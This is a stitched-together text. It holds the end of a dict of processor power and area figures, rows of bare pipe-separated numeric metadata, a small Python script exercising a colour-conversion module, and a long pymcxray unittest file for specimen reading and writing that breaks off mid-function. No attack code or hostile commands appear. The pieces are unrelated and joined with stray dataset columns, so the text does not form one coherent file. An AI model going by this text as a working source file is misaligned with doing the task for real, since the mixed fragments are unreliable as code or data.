'Renaming Unit/Free List/Runtime Dynamic': 0.0232596,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.157271,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.831574,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.82007,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.9647131814390915,
'Runtime Dynamic': 0.9647131814390915,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.572859,
'Runtime Dynamic': 0.331696,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 98.8232,
'Peak Power': 131.935,
'Runtime Dynamic': 29.3204,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 98.2503,
'Total Cores/Runtime Dynamic': 28.9887,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.572859,
'Total L3s/Runtime Dynamic': 0.331696,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.017505
| 124
| 0.681883
| 8,082
| 68,566
| 5.779015
| 0.066939
| 0.123667
| 0.113048
| 0.093521
| 0.94095
| 0.932921
| 0.921766
| 0.890999
| 0.86976
| 0.851432
| 0
| 0.131246
| 0.22447
| 68,566
| 914
| 125
| 75.017505
| 0.747099
| 0
| 0
| 0.650985
| 0
| 0
| 0.657824
| 0.048128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6a8d638f4b507ce65c9928006b506c906bc662a
| 1,207
|
py
|
Python
|
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
import color_converter as cc
print("cc.rgbhex_to_rgb255('#0080ff')")
print(cc.rgbhex_to_rgb255('#0080ff'))
print("cc.rgb255_to_rgbhex((0, 128, 255))")
print(cc.rgb255_to_rgbhex((0, 128, 255)))
print("cc.lab_to_lch((80, 10, 17.32))")
print(cc.lab_to_lch((80, 10, 17.32)))
print("cc.lch_to_lab((80, 20, 60))")
print(cc.lch_to_lab((80, 20, 60)))
print("cc.hsl_to_rgbhex((210, 0.4, 0.7))")
print(cc.hsl_to_rgbhex((210, 0.4, 0.7)))
print("cc.lch_to_rgbhex((70, 40, 210))")
print(cc.lch_to_rgbhex((70, 40, 210)))
# test with Adobe Photoshop CS6
print("cc.lab_to_rgb255((0, 0, 0)) -> [0, 0, 0]")
print(cc.lab_to_rgb255((0, 0, 0)))
print("cc.lab_to_rgb255((50, 0, 0)) -> [119, 119, 119]")
print(cc.lab_to_rgb255((50, 0, 0)))
print("cc.lab_to_rgb255((100, 0, 0)) -> [255, 255, 255]")
print(cc.lab_to_rgb255((100, 0, 0)))
print("cc.lab_to_rgb255((50, 50, 0)) -> [193, 78, 121]")
print(cc.lab_to_rgb255((50, 50, 0)))
print("cc.lab_to_rgb255((50, 0, 50)) -> [136, 118, 22]")
print(cc.lab_to_rgb255((50, 0, 50)))
print("cc.lab_to_rgb255((50, -50, 0)) -> [0, 140, 117]")
print(cc.lab_to_rgb255((50, -50, 0)))
print("cc.lab_to_rgb255((50, 0, -50)) -> [54, 122, 205]")
print(cc.lab_to_rgb255((50, 0, -50)))
| 26.822222
| 57
| 0.636288
| 241
| 1,207
| 2.966805
| 0.190871
| 0.254545
| 0.223776
| 0.268531
| 0.867133
| 0.862937
| 0.862937
| 0.862937
| 0.40979
| 0.40979
| 0
| 0.230769
| 0.106048
| 1,207
| 44
| 58
| 27.431818
| 0.431881
| 0.024027
| 0
| 0
| 0
| 0
| 0.439523
| 0.189949
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.037037
| 0
| 0.037037
| 0.962963
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
b6b03dd7011886ac0f0a588a4c1cce01b1613093
| 38,178
|
py
|
Python
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 1
|
2020-07-23T12:13:30.000Z
|
2020-07-23T12:13:30.000Z
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 3
|
2017-03-05T16:09:30.000Z
|
2017-03-05T16:11:41.000Z
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.test_Specimen
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests for module `Specimen`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion informations for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import unittest
import logging
import os.path
import copy
# Third party modules.
from nose.plugins.skip import SkipTest
# Local modules.
# Project modules
import pymcxray.FileFormat.Specimen as Specimen
import pymcxray.FileFormat.testUtilities as testUtilities
import pymcxray.FileFormat.Region as Region
import pymcxray.FileFormat.Element as Element
import pymcxray.FileFormat.RegionType as RegionType
import pymcxray.FileFormat.RegionDimensions as RegionDimensions
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
class TestSpecimen(unittest.TestCase):
"""
TestCase class for the module `Specimen`.
"""
def setUp(self):
"""
Setup method.
"""
unittest.TestCase.setUp(self)
self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../test_data"))
self.tempDataPath = testUtilities.createTempDataPath(self.testDataPath)
def tearDown(self):
"""
Teardown method.
"""
unittest.TestCase.tearDown(self)
testUtilities.removeTempDataPath(self.tempDataPath)
def testSkeleton(self):
"""
First test to check if the testcase is working with the testing framework.
"""
#self.fail("Test if the testcase is working.")
self.assert_(True)
def test_read(self):
"""
Tests for method `read`.
"""
for title in testUtilities.getSimulationTitles():
logging.info(title)
specimen = Specimen.Specimen()
filepath = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.sam" % (title, title)))
specimen.read(filepath)
self.assertEquals(Version.VERSION_1_1_1.major, specimen.version.major)
self.assertEquals(Version.VERSION_1_1_1.minor, specimen.version.minor)
self.assertEquals(Version.VERSION_1_1_1.revision, specimen.version.revision)
self.assertEquals(Version.VERSION_1_1_1, specimen.version)
specimenRef = self.getSpecimenReference(title)
self.assertEquals(specimenRef.version.major, specimen.version.major)
self.assertEquals(specimenRef.version.minor, specimen.version.minor, title)
self.assertEquals(specimenRef.version.revision, specimen.version.revision)
self.assertEquals(specimenRef.version, specimen.version)
self.assertEquals(specimenRef.numberRegions, specimen.numberRegions)
#self.fail("Test if the testcase is working.")
def test_read_1_1_1(self):
"""
Tests for method `read`.
"""
specimen = Specimen.Specimen()
title = "AlMgBulk5keV_version_1_1_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
specimen.read(filepath)
self.assertEquals(Version.VERSION_1_1_1.major, specimen.version.major)
self.assertEquals(Version.VERSION_1_1_1.minor, specimen.version.minor)
self.assertEquals(Version.VERSION_1_1_1.revision, specimen.version.revision)
self.assertEquals(Version.VERSION_1_1_1, specimen.version)
specimenRef = self.getSpecimenReference(title)
self.assertEquals(specimenRef.version.major, specimen.version.major)
self.assertEquals(specimenRef.version.minor, specimen.version.minor)
self.assertEquals(specimenRef.version.revision, specimen.version.revision)
self.assertEquals(specimenRef.version, specimen.version)
self.assertEquals(specimenRef.numberRegions, specimen.numberRegions)
indexRegion = 0
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexElement = 1
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 1
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 2
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
#self.fail("Test if the testcase is working.")
def test_read_1_2_0(self):
"""
Tests for method `read`.
"""
specimen = Specimen.Specimen()
title = "AlMgBulk5keV_version_1_2_0"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
specimen.read(filepath)
self.assertEquals(Version.VERSION_1_2_0.major, specimen.version.major)
self.assertEquals(Version.VERSION_1_2_0.minor, specimen.version.minor)
self.assertEquals(Version.VERSION_1_2_0.revision, specimen.version.revision)
self.assertEquals(Version.VERSION_1_2_0, specimen.version)
specimenRef = self.getSpecimenReference(title)
self.assertEquals(specimenRef.version.major, specimen.version.major)
self.assertEquals(specimenRef.version.minor, specimen.version.minor)
self.assertEquals(specimenRef.version.revision, specimen.version.revision)
self.assertEquals(specimenRef.version, specimen.version)
self.assertEquals(specimenRef.numberRegions, specimen.numberRegions)
indexRegion = 0
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexElement = 1
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 1
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 2
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
#self.fail("Test if the testcase is working.")
def test_read_1_2_1(self):
"""
Tests for method `read`.
"""
specimen = Specimen.Specimen()
title = "AlMgBulk5keV_version_1_2_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
specimen.read(filepath)
self.assertEquals(Version.VERSION_1_2_1.major, specimen.version.major)
self.assertEquals(Version.VERSION_1_2_1.minor, specimen.version.minor)
self.assertEquals(Version.VERSION_1_2_1.revision, specimen.version.revision)
self.assertEquals(Version.VERSION_1_2_1, specimen.version)
specimenRef = self.getSpecimenReference(title)
self.assertEquals(specimenRef.version.major, specimen.version.major)
self.assertEquals(specimenRef.version.minor, specimen.version.minor)
self.assertEquals(specimenRef.version.revision, specimen.version.revision)
self.assertEquals(specimenRef.version, specimen.version)
self.assertEquals(specimenRef.numberRegions, specimen.numberRegions)
indexRegion = 0
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexElement = 1
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 1
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 2
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
#self.fail("Test if the testcase is working.")
def test_read_1_4_1(self):
"""
Tests for method `read`.
"""
specimen = Specimen.Specimen()
title = "AlMgBulk5keV_version_1_4_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
specimen.read(filepath)
self.assertEquals(Version.VERSION_1_4_1.major, specimen.version.major)
self.assertEquals(Version.VERSION_1_4_1.minor, specimen.version.minor)
self.assertEquals(Version.VERSION_1_4_1.revision, specimen.version.revision)
self.assertEquals(Version.VERSION_1_4_1, specimen.version)
specimenRef = self.getSpecimenReference(title)
self.assertEquals(specimenRef.version.major, specimen.version.major)
self.assertEquals(specimenRef.version.minor, specimen.version.minor)
self.assertEquals(specimenRef.version.revision, specimen.version.revision)
self.assertEquals(specimenRef.version, specimen.version)
self.assertEquals(specimenRef.numberRegions, specimen.numberRegions)
indexRegion = 0
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexElement = 1
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 1
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
indexRegion = 2
region = specimen.regions[indexRegion]
regionRef = specimenRef.regions[indexRegion]
self.assertEquals(regionRef.numberElements, region.numberElements)
self.assertEquals(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
self.assertEquals(regionRef.regionType, region.regionType)
self.assertEquals(regionRef.regionDimensions, region.regionDimensions)
indexElement = 0
element = region.elements[indexElement]
elementRef = regionRef.elements[indexElement]
self.assertEquals(elementRef.atomicNumber, element.atomicNumber)
self.assertEquals(elementRef.massFraction, element.massFraction)
#self.fail("Test if the testcase is working.")
def test_write(self):
"""
Tests for method `write`.
"""
raise SkipTest
self.maxDiff = None
for title in testUtilities.getSimulationTitles():
logging.info(title)
specimenRef = self.getSpecimenReference(title)
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.sam" % (title, title)))
filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))
specimen = Specimen.Specimen()
specimen = specimenRef
specimen.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
for index in range(len(linesRef)):
lineRef = linesRef[index]
line = lines[index]
message = "%i:\n%s\n%s" % (index, lineRef, line)
self.assertEquals(lineRef, line, message)
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_1_1(self):
"""
Tests for method `write`.
"""
raise SkipTest
self.maxDiff = None
title = "AlMgBulk5keV_version_1_1_1"
specimenRef = self.getSpecimenReference(title)
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))
specimen = specimenRef
specimen.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
for index in range(len(linesRef)):
lineRef = linesRef[index]
line = lines[index]
message = "%i:\n%s\n%s" % (index, lineRef, line)
self.assertEquals(lineRef, line, message)
self.assertListEqual(linesRef, lines)
self.fail("Test if the testcase is working.")
def test_write_1_2_0(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_2_0"
specimenRef = self.getSpecimenReference(title)
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))
specimen = specimenRef
specimen.version = copy.deepcopy(Version.VERSION_1_2_0)
specimen.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
for index in range(len(linesRef)):
lineRef = linesRef[index]
line = lines[index]
message = "%i:\n%s\n%s" % (index, lineRef, line)
self.assertEquals(lineRef, line, message)
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_2_1(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_2_1"
specimenRef = self.getSpecimenReference(title)
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))
specimen = specimenRef
specimen.version = copy.deepcopy(Version.VERSION_1_2_1)
specimen.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
for index in range(len(linesRef)):
lineRef = linesRef[index]
line = lines[index]
message = "%i:\n%s\n%s" % (index, lineRef, line)
self.assertEquals(lineRef, line, message)
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_4_1(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_4_1"
specimenRef = self.getSpecimenReference(title)
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))
specimen = specimenRef
specimen.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
for index in range(len(linesRef)):
lineRef = linesRef[index]
line = lines[index]
message = "%i:\n%s\n%s" % (index, lineRef, line)
self.assertEquals(lineRef, line, message)
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def getSpecimenReference(self, title):
specimen = Specimen.Specimen()
if title == "AuBC cyl":
specimen.numberRegions = 4
specimen.version = Version.Version(1, 1, 1)
region = Region.Region()
region.numberElements = 1
element = Element.Element(6)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(79)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [0.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(5)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [-500.0, -500.0, 300.0, 0.0, 1.0, 0.35, 1000.0, 300.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(5)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [500.0, 500.0, 300.0, 0.0, -1.0, 0.35, 1000.0, 300.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
elif title == "BioRitchieNew111017":
specimen.numberRegions = 7
specimen.version = Version.Version(1, 1, 1)
region = Region.Region()
region.numberElements = 3
element = Element.Element(6, 0.7)
region.elements.append(element)
element = Element.Element(8, 0.28)
region.elements.append(element)
element = Element.Element(17, 0.02)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 1.14
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 2
element = Element.Element(8, 0.53)
region.elements.append(element)
element = Element.Element(14, 0.47)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 2.2
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [-20000.0, 0.0, 30000.0, 1.0, 0.0, 0.0, 40000.0, 30000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 3
element = Element.Element(6, 0.7)
region.elements.append(element)
element = Element.Element(8, 0.28)
region.elements.append(element)
element = Element.Element(17, 0.02)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 1.14
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [-20000.0, 0.0, 30000.0, 1.0, 0.0, 0.0, 40000.0, 29500.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 7
region.elements.append(Element.Element(1, 0.071))
region.elements.append(Element.Element(6, 0.414))
region.elements.append(Element.Element(7, 0.168))
region.elements.append(Element.Element(8, 0.285))
region.elements.append(Element.Element(15, 0.036))
region.elements.append(Element.Element(16, 0.006))
region.elements.append(Element.Element(76, 0.02))
region.regionMassDensity_g_cm3 = 1.32
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [12000.0, 10000.0, 10000.0, 8000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 9
region.elements.append(Element.Element(1, 0.11))
region.elements.append(Element.Element(6, 0.49))
region.elements.append(Element.Element(7, 0.12))
region.elements.append(Element.Element(8, 0.25))
region.elements.append(Element.Element(12, 0.003))
region.elements.append(Element.Element(15, 0.003))
region.elements.append(Element.Element(16, 0.003))
region.elements.append(Element.Element(25, 0.001))
region.elements.append(Element.Element(76, 0.02))
region.regionMassDensity_g_cm3 = 1.24
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [-10000.0, 0.0, 20000.0, 15000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 9
region.elements.append(Element.Element(1, 0.11))
region.elements.append(Element.Element(6, 0.49))
region.elements.append(Element.Element(7, 0.12))
region.elements.append(Element.Element(8, 0.25))
region.elements.append(Element.Element(12, 0.003))
region.elements.append(Element.Element(15, 0.003))
region.elements.append(Element.Element(16, 0.003))
region.elements.append(Element.Element(25, 0.001))
region.elements.append(Element.Element(76, 0.02))
region.regionMassDensity_g_cm3 = 1.24
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [10000.0, -5000.0, 25000.0, 6000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 7
region.elements.append(Element.Element(1, 0.077))
region.elements.append(Element.Element(6, 0.497))
region.elements.append(Element.Element(7, 0.11))
region.elements.append(Element.Element(8, 0.259))
region.elements.append(Element.Element(15, 0.031))
region.elements.append(Element.Element(16, 0.006))
region.elements.append(Element.Element(76, 0.02))
region.regionMassDensity_g_cm3 = 1.18
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [-23000.0, 4000.0, 33500.0, 2000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
specimen._shortHeader = True
elif title == "Bug Al Zr Sphere":
specimen.numberRegions = 2
specimen.version = Version.Version(1, 1, 1)
region = Region.Region()
region.numberElements = 1
element = Element.Element(13)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 1000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(40)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [0.0, 0.0, 500.0, 499.9]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
elif title == "Mg2SiAlCube3kev":
specimen.numberRegions = 2
specimen.version = Version.Version(1, 1, 1)
region = Region.Region()
region.numberElements = 2
element = Element.Element(12, 0.5)
region.elements.append(element)
element = Element.Element(13, 0.5)
